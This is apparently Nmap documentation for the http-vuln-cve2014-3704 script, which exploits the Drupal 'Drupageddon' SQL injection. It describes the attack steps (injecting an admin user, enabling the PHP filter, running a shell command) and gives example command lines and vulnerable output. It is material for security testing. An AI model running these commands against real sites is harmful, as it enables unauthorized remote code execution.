Categories: vuln, intrusive, exploit
Exploits CVE-2014-3704 also known as 'Drupageddon' in Drupal. Versions < 7.32 of Drupal core are known to be affected.
Vulnerability allows remote attackers to conduct SQL injection attacks via an array containing crafted keys.
The script injects new Drupal administrator user via login form and then it attempts to log in as this user to determine if target is vulnerable. If that's the case following exploitation steps are performed:
- PHP filter module which allows embedded PHP code/snippets to be evaluated is enabled,
- permission to use PHP code for administrator users is set,
- new article which contains payload is created & previewed,
- cleanup: by default all DB records that were added/modified by the script are restored.
Vulnerability originally discovered by Stefan Horst from SektionEins.
Exploitation technique used to achieve RCE on the target is based on exploit/multi/http/drupal_drupageddon Metasploit module.
Drupal root directory on the website. Default: /
Shell command to execute. Default: nil
Indicates whether cleanup (removing DB records that was added/modified during exploitation phase) will be done. Default: true
slaxml.debugSee the documentation for the slaxml library.
http.host, http.max-cache-size, http.max-pipeline, http.pipeline, http.useragentSee the documentation for the http library.
smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusernameSee the documentation for the smbauth library.
vulns.short, vulns.showallSee the documentation for the vulns library.
nmap --script http-vuln-cve2014-3704 --script-args http-vuln-cve2014-3704.cmd="uname -a",http-vuln-cve2014-3704.uri="/drupal" <target> nmap --script http-vuln-cve2014-3704 --script-args http-vuln-cve2014-3704.uri="/drupal",http-vuln-cve2014-3704.cleanup=false <target>
PORT STATE SERVICE REASON 80/tcp open http syn-ack | http-vuln-cve2014-3704: | VULNERABLE: | Drupal - pre Auth SQL Injection Vulnerability | State: VULNERABLE (Exploitable) | IDs: CVE:CVE-2014-3704 | The expandArguments function in the database abstraction API in | Drupal core 7.x before 7.32 does not properly construct prepared | statements, which allows remote attackers to conduct SQL injection | attacks via an array containing crafted keys. | | Disclosure date: 2014-10-15 | Exploit results: | Linux debian 3.2.0-4-amd64 #1 SMP Debian 3.2.51-1 x86_64 GNU/Linux | References: | https://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html | https://www.drupal.org/SA-CORE-2014-005 | http://www.securityfocus.com/bid/70595 |_ https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3704
License: Same as Nmap--See https://nmap.org/book/man-legal.html